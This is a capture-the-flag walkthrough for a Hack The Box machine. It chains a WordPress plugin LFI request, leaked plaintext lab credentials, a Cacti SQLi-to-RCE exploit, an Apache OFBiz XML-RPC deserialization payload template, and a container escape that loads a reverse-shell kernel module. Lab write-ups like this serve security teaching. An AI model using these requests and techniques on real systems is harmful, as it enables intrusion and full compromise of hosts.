nmap -A -oN nmap/detailed.nmap -p22,80 10.10.10.238
Upon visiting the website at port 80, we find a Wordpress website.
After some basic enumeration, we find that there is no index.html at /wp-content/plugins, so we can view the installed plugins.
By looking at the readme.txt file, we can figure out that it's version 1.0
Next, we can look for public exploits using searchsploit
searchsploit wp spritz
The exploitdb file informs us of a LFI vulnerability, which can be achieved with the following GET request:
GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
From the /etc/passwd file, we note interesting users such as marcus and mysql
Now that we have LFI, our next objective is choosing files to view based on what we know about the box to further our access.
We should look for files related to Wordpress and Apache.
Starting with wp-config.php:
We found a plaintext password! BestAdministrator@2020!
After trying the password on Wordpress, we quickly find out that it is not a valid password for it.
Let's take a look at the apache config now at /etc/apache2/sites-enabled/000-default.conf:
From the apache config, we learn of a new VHOST cacti-admin.monitors.htb
From the home page, we learn that the version is 1.2.12, and trying the creds "admin:BestAdministrator@2020" works!
With this, we are able to use a public exploit
(https://www.exploit-db.com/exploits/49810)
to gain a foothold as www-data through authenticated SQLi to RCE.
Checking out database with “BestAdministrator@2020!” as the password:
mysql -u wpadmin -p
Looking at cacti’s config and finding database creds:
Checking out database with password "cactipass"
mysql -u cacti -p
In marcus' home directory, we see a non-default hidden directory called ".backup":
We can try to figure out if there is a systemd service that is using this directory with the following:
grep -Ri '\.backup' /etc 2>/dev/null
The output indicates that there is a service using a script called backup.sh.
After taking a look at the script, we find plaintext credentials:
After trying the password in a couple places, we find that it works through ssh with marcus (marcus:VerticalEdge2020)
After learning that Docker is running on this box, we can take a look at the process list for anything interesting:
ps -ef | grep docker
Since there is a docker container listening on port 8443, let's create an ssh tunnel to this port.
ssh -N -L 8443:127.0.0.1:8443 marcus@10.10.10.238
Upon navigating to the service, we get a 404, but we learn that it is a Tomcat server
Let's try to find valid directories on this tomcat server with gobuster
gobuster dir -u https://127.0.0.1:8443 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt -k
Interestingly, navigating to a valid directory redirects us to Apache OfBiz login page.
The bottom right corner of the page reveals that the version is 17.12.01, which has a public exploit available:
searchsploit ofbiz 17.12.01
After some research, we find a nice guide on the exploit:
https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2020-9496
Download ysoserial, then create base64 encoded payloads like this:
With the payloads generated, make POST requests like this to get command execution:
POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
With this, we get a shell as root on the docker container.
With the following command, we can learn of all capabilities of the docker container:
capsh --print
cap_sys_module capability allows us to load kernel modules, and since the kernel is shared with the host, we can get code execution as the host's root user.
Here is a great guide on how to create a reverse shell kernel module:
https://greencashew.dev/posts/how-to-add-reverseshell-to-host-from-the-privileged-container/
With the kernel module created, we get root by inserting it with insmod
insmod reverseshell_module.ko
